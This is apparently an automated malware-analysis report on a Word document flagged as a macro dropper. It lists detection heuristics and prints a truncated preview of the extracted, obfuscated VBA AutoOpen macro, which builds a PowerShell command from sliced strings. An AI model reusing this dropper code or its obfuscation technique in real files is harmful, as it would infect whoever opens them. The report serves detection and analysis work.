Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic
The file is a Microsoft Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an attempt to execute external commands. The ClamAV detection 'Doc.Dropper.Agent-6550711-0' further supports its malicious nature. The macro appears to be constructing a PowerShell command, likely to download and execute a second-stage payload.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6550700-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6550700-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 205659 bytes |

SHA-256 (macros.bas): c807a53e51d1486ab3d0439e7db5f87adb1a450920171dad1ae9341e6c455afd
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "dbjmuzZFWV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function JLYTXboIp()
On Error Resume Next
kHmrrJTC = (AATfKzIqw - CDbl(618155) + iQrclAPhb + Fix(nOccQk / CLng(652730 * Sqr(FwoYUjuJO))) - 782067 / Sin(OTwztO - wIsfAqbcr - 727513 + CLng(rlXqOaVDuK)) * 509199 * Fix(618155))
zFECi = "ErJY5]xJ6uQsjiLt( $GnTxioH0wpMgENV:comSpec[4,15,2wAcuV5ltbjhr1owershell & HDRmpous6tB3D1UIO7dl-y5IwZdDUlmM5d"
amoNzsuUiTO = Left(Right(zFECi, 46), 12) + CStr(Left(Right(zFECi, 92), 3)) + Left(Right(zFECi, 77), 18) + Left(Right(zFECi, 104), 2) + CStr(Left(Right(zFECi, 14), 1))
QlTUJJScWqI = "w2 ((xRgC70nsadaxRg((('fVkFOZUUQwjoIN'') SCVgjYwseUHlwGmqx0MKXetyqE6OVl7oaqJwhylBJVu0De"
GSDuOzRXTX = CStr(Left(Right(QlTUJJScWqI, 54), 8)) + Left(Right(QlTUJJScWqI, 68), 4) + Left(Right(QlTUJJScWqI, 85), 17)
wicYMHjb = Chr(43)
spHALVSc = "dxRg6swENxRgrJka5tW2l9Cf"
jKcPCn = CStr(Left(Right(spHALVSc, 15), 3)) + CStr(Left(Right(spHALVSc, 19), 1)) + Left(Right(spHALVSc, 24), 4)
isQtRv = Chr(43)
jIKOHWRTW = " = 'gawExRHBrJka5tW2l"
OzlPBKsnfD = Left(Right(jIKOHWRTW, 13), 2) + Left(Right(jIKOHWRTW, 17), 1) + CStr(Left(Right(jIKOHWRTW, 21), 4))
riXTiM = Chr(43)
mNUEqGazdI = "g2cR'xwENTHB"
sADwqnrakji = CStr(Left(Right(mNUEqGazdI, 8), 2)) + Left(Right(mNUEqGazdI, 9), 1) + CStr(Left(Right(mNUEqGazdI, 12), 1))
iFAsO = Chr(43)
RHzXaZIIcZ = (qmJtHU - CDbl(598014) + bfHSQmj + Fix(uVVzijG / CLng(330987 * Sqr(wSdUE))) - 411382 / Sin(MnBAsUWjUC - dzPfzqKqI - 930972 + CLng(nndqbkjMa)) * 586237 * Fix(598014))
TKJwDrMjR = "(xRg6&wENxRgrJka5tW2l9Cf"
kMzbVFGc = CStr(Left(Right(TKJwDrMjR, 15), 3)) + CStr(Left(Right(TKJwDrMjR, 19), 1)) + Left(Right(TKJwDrMjR, 24), 4)
BrsDzBtO = Chr(43)
kLwvKG = "'2cgxRwENTHB"
tFJikO = CStr(Left(Right(kLwvKG, 8), 2)) + Left(Right(kLwvKG, 9), 1) + CStr(Left(Right(kLwvKG, 12), 1))
kVqQErGViL = Chr(43)
mFkGcmvU = "xRgVKa'wNTHBrJka5t"
VIICjEJCvcl = CStr(Left(Right(mFkGcmvU, 12), 2)) + Left(Right(mFkGcmvU, 14), 1) + CStr(Left(Right(mFkGcmvU, 18), 3))
hXiSwQ = Chr(43)
fEVLYrDzYN = "nxRg60wENxRgrJka5tW2l9Cf"
Cclokj = CStr(Left(Right(fEVLYrDzYN, 15), 3)) + CStr(Left(Right(fEVLYrDzYN, 19), 1)) + Left(Right(fEVLYrDzYN, 24), 4)
KItaZHFRJUk = (XTPsmtK - CDbl(184297) + MWdzY + Fix(HqHcvS / CLng(708774 * Sqr(kYISwkdSH))) - 452673 / Sin(jnmjXKMmn - Emofu - 470966 + CLng(LzOJj)) * 778674 * Fix(184297))
bEhpFYpiPX = Chr(43)
PVEFks = "wK0VgaxRNTHBrJka5t"
jnzBEGRdJI = CStr(Left(Right(PVEFks, 12), 2)) + Left(Right(PVEFks, 14), 1) + CStr(Left(Right(PVEFks, 18), 3))
bhvlYmHfWAT = Chr(43)
PrYmmi = "g2Rx6awEN"
RXJSzhI = Left(Right(PrYmmi, 6), 1) + Left(Right(PrYmmi, 7), 1) + Left(Right(PrYmmi, 9), 1)
Fjfnz = Chr(43)
hLIWw = "jxRg2JXV6EkeXawK0EF'ntAO"
Ojjvvb = Left(Right(hLIWw, 23), 3) + CStr(Left(Right(hLIWw, 10), 3)) + CStr(Left(Right(hLIWw, 13), 1)) + Left(Right(hLIWw, 5), 1)
BDosBIlJYYw = (FskjuKYf - CDbl(989527) + FiVioWcik + Fix(vdwZcslzli / CLng(876770 * Sqr(iCnamYnwjk))) - 382392 / Sin(mPvZTKN - JbojBwGSIr - 17 + CLng(Mnzqac)) * 60831 * Fix(989527))
hTtRo = Chr(43)
dmYnHrMhrt = "'wpj10aKJXV6"
zMwkZJipLz = Left(Right(dmYnHrMhrt, 12), 2) + CStr(Left(Right(dmYnHrMhrt, 5), 1)) + Left(Right(dmYnHrMhrt, 7), 1)
FPGJcRaPjMB = Chr(43)
PBWCCcCcoj = "gawK0V6EkMXabeMjFhnw-obdxRwOuESP8"
wJjcHWIb = Left(Right(PBWCCcCcoj, 31), 3) + Left(Right(PBWCCcCcoj, 14), 4) + CStr(Left(Right(PBWCCcCcoj, 18), 1)) + Left(Right(PBWCCcCcoj, 9), 2) + Left(Right(PBWCCcCcoj, 33), 1)
sjkAQrKjz = Chr(43)
uIwQMFFL = "pxR3a2JXVgRkgexbeMEFh"
ElSRCvsFBTC = CStr(Left(Right(uIwQMFFL, 20), 2)) + CStr(Left(Right(uIwQMFFL, 9), 3)) + Left(Right(uIwQMFFL, 11), 1) + Left(Right(uIwQMFFL, 12), 1)
awmwbt = Chr(43)
aSLFkUCJj = "jxRg2JXV6EkRXacwxEFgntAO"
aSDVMMjWJ = Left(Right(aSLFkUCJj, 23), 3) + CStr(Left(Right(aSLFkUCJj, 10), 3)) + CStr(Left(Right(aSLFkUCJj, 13), 1)) + Left(Right(aSLFkUCJj, 5), 1)
NSPRCYiA
... (truncated)